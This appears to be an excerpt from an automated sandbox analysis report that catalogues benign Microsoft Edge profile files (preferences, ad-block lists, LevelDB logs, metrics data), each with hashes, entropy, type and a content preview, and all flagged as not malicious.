MD5:	E6A1985AA18C861B26C1F626F86FEAB6
SHA1:	7F9B5AD5B4454DFED99EA3021FA59DD53EC929FA
SHA-256:	64BA0A7DCD4E563209F3F9A9FED886DF89FCD9BB9FD193A8FE1A1CC61EA0347B
SHA-512:	CD5BB9986762AF44D7E7D8B06EFC73279BB09F48F986C598F8B4C90013AD20A29DE489D895123CE859FFBA60C75877DCF1C0B9BCC71B1C563D1021E90B98A825
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377050731294325","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"95ccd42f-fd6f-4ef8-b475-5ec31f788b59"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732577135"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6b9e6fdc-b8b4-4cf1-af62-34915fa08363.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46430
Entropy (8bit):	6.0870099226540315
Encrypted:	false
SSDEEP:	768:MMkbJrT8IeQc5dKPzAi1zNtea29y9VSMC421IQmxgpCio9JDSgzMMd6qD47u30H:MMk1rT8H1K26AIQ9Fo9tSmd6qE7p
MD5:	4DCF6C82C45B5B34013FE19E5DC69DF4
SHA1:	28F9ECA6642C8C60AC1FC4210EB75BED485EBE96
SHA-256:	307BB7982732EFA57119A0EE33B4E5531B4E42FE5837575E0C5ADB38D54D717D
SHA-512:	0081FABFF8B9DD0C8B4514969C8D9240E172188CB80E316368794B52E0EFCA3C6448609C6713C8A780051910BF36330FFCB61077CA3C70C3E0CDB70C93A96314
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377050731294325","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"95ccd42f-fd6f-4ef8-b475-5ec31f788b59"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732577135"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8934160b-3bb2-48c9-99d2-42b6a78649af.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44992
Entropy (8bit):	6.095318752343929
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4xWBdi1zNtea29y9VSMC421KJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOy6AKtSmd6qE7lFoC
MD5:	E43F89B4B29123A1E0A16C7F9887B94E
SHA1:	B2225A2F858868633043510E66A3459A403A25BB
SHA-256:	DE15220A58DDF5D1F730730EA4DA293000D9D4F9F8935E8E3E61CF3192FD1A10
SHA-512:	05732E58831EC20CCA7B22BA10E201260D395F62EBA43FB0C33E198C50268EACB89AED0D202DAFD33AA116C57682C97D9FBFB87BB9283B218ED1C7C71CA1F522
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\1273b91a-9a80-4fd1-8881-ebe453cd4a46.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67450769-1CEC.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4591882409244129
Encrypted:	false
SSDEEP:	6144:+ddU4O4/n3cNmukMgd+R6qsjFaHGL8ug:I3c491Im
MD5:	837F31C5C5488842710EA00626E0163A
SHA1:	2C3B52380185DC0C86F923EEC8E75BE779B84B98
SHA-256:	5FD2CB752D5367CC9EC78E164EF567A680DAF8F4E6CFEEB08E72D13D7DAD30D8
SHA-512:	3BE1E0AB27E3800669745D8FA5C0FAC7848CA101E3667F1312830A7821240E1C8D21C5F9B26F7E2141D5C77734663399D604F0AC8D55A7575033745B84B17874
Malicious:	false
Preview:	...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".jaryaj20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.0984945491284295
Encrypted:	false
SSDEEP:	3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
MD5:	AFAC5E4CC1213807ACB7D1A0F61BCF99
SHA1:	FEDCA0A829A0DBCCD1E9D7048398372FF9604783
SHA-256:	FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
SHA-512:	44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
Malicious:	false
Preview:	sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\177fb397-ac4c-46d3-964d-4c970eee639c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561673545414158
Encrypted:	false
SSDEEP:	768:LfNyaXWTT7pLGLPqgW5w55f4P18F1+UoAYDCx9Tuqh0VfUC9xbog/OVPbzWlIJW7:L1lX4FcPqgWa55fA1u1jaSzWqXW+lY6M
MD5:	AA5DF9AA43B26D48944FBCA8CF794884
SHA1:	2DA8832F2CD0C271B182FFA1DE2EC5A02930805F
SHA-256:	E5A877F774D9727A99B73F6DEF84AB3B693BFF537B52AB0BA1099BEE3B55D6C9
SHA-512:	88E9DD6D3470CC9B13BCDB576BCB3D0236CAC9C896155B5A242332494EC7C96CC902A61836CD37AE399E7A675E3118E77F7075FD010D65F7AEEC7E87DA03407C
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377050729938671","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377050729938671","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1e568550-e088-4f33-8eb7-8c618abc4681.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6086e4a3-de12-44c7-b877-5ce93cec6938.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17555), with no line terminators
Category:	dropped
Size (bytes):	17557
Entropy (8bit):	5.484320698861109
Encrypted:	false
SSDEEP:	384:st1PGQSu4+scKCDvCfiKq70bSzwiXmbGJQwd3g:sjOXutKC+ZbGaqg
MD5:	DAE0DC52316436B977F94365A79ACC1F
SHA1:	668C9B26EE7BA11A799A65D576FC6D66E2EC0495
SHA-256:	913B5C5EBE345AD63947DEE1B52E1A6262B349E9F6E8025CDBE6D9B356F2BF0A
SHA-512:	959B98C42BBF6EAFEC272DF43291E364C40A5FF140F9A76C87A87D31CE40BF41657DA20C04CD8EEDED3B6B38E53638B770BCBAB2BD79A2E7A9CBC8E0BCCAAFD4
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	313
Entropy (8bit):	5.251607037935565
Encrypted:	false
SSDEEP:	6:HApILoq1N723oH+Tcwtp3hBtB2KLlVApzOq2PN723oH+Tcwtp3hBWsIFUv:g8oaaYebp3dFLoBOvVaYebp3eFUv
MD5:	DE8F1A4089739A20FA511916791BE76F
SHA1:	86D4AD392A4E33C63CFBB53C2921A53C843C8F67
SHA-256:	B20A380C30091B9D1F71392EF4809E32B0CD6607B4B083330DC945C711D9C224
SHA-512:	FD3B5269FA28FF6882726138C67D4DD8A8825D2D78B7D9296BF7B7BE79E1F2BA0F95BA569D97E8FE4D2236E83D1B06CAE1932B6E7FAFB47A01104BB72956CD80
Malicious:	false
Preview:	2024/11/25-18:25:35.994 1a40 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/25-18:25:36.024 1a40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222872506099923
Encrypted:	false
SSDEEP:	24576:IbPMZpVzfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVzfx2mjF
MD5:	037FF192777293A3CBE849D059517DA5
SHA1:	F5B9F2EBF25CCAF78F05BBB15051B22D1E04614F
SHA-256:	0551E851709C7BAF380D6898FAF40CB9E9CA6B1D336C2713CB7A699D39792EBA
SHA-512:	0FF42905FA62183EED853B19933FDB3437BBDCC8AA658773FBE906FC0816F0B95987FDB8AF1AF7B0A466089E815A04F506219B21EA43FE3D209143EA179DF5E0
Malicious:	false
Preview:	...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4...13340960289901340.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	340
Entropy (8bit):	5.124321844347563
Encrypted:	false
SSDEEP:	6:HApILz3+q2PN723oH+Tcwt9Eh1tIFUt8YApILr5Zmw+YApILF3VkwON723oH+Tcf:g86vVaYeb9Eh16FUt878r5/+78FF5Oaw
MD5:	4E7CC4ACE4851C2A1CD6685B1DF722C7
SHA1:	7B0AFB1C2E2CF7DFA7B35630913D5B13C53160EE
SHA-256:	C2AC3DEFEEBD1A81406A476E7907D4B16578005B0E53F10A76BCCC90003B081C
SHA-512:	E9123473CDDD34FECE1364560FC08E422D36A64BECDDD42CA53979AC21C026B0ADBA01D53CB4D1CCA423B704B63E6D3EDF6469465C4049693724F858FE57D787
Malicious:	false
Preview:	2024/11/25-18:25:35.410 10f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/25-18:25:35.412 10f8 Recovering log #3.2024/11/25-18:25:35.416 10f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	340
Entropy (8bit):	5.124321844347563
Encrypted:	false
SSDEEP:	6:HApILz3+q2PN723oH+Tcwt9Eh1tIFUt8YApILr5Zmw+YApILF3VkwON723oH+Tcf:g86vVaYeb9Eh16FUt878r5/+78FF5Oaw
MD5:	4E7CC4ACE4851C2A1CD6685B1DF722C7
SHA1:	7B0AFB1C2E2CF7DFA7B35630913D5B13C53160EE
SHA-256:	C2AC3DEFEEBD1A81406A476E7907D4B16578005B0E53F10A76BCCC90003B081C
SHA-512:	E9123473CDDD34FECE1364560FC08E422D36A64BECDDD42CA53979AC21C026B0ADBA01D53CB4D1CCA423B704B63E6D3EDF6469465C4049693724F858FE57D787
Malicious:	false
Preview:	2024/11/25-18:25:35.410 10f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/25-18:25:35.412 10f8 Recovering log #3.2024/11/25-18:25:35.416 10f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46209615488581335
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuSft:TouQq3qh7z3bY2LNW9WMcUvBui
MD5:	8F6181E5AF363E59876F2BC872871A9B
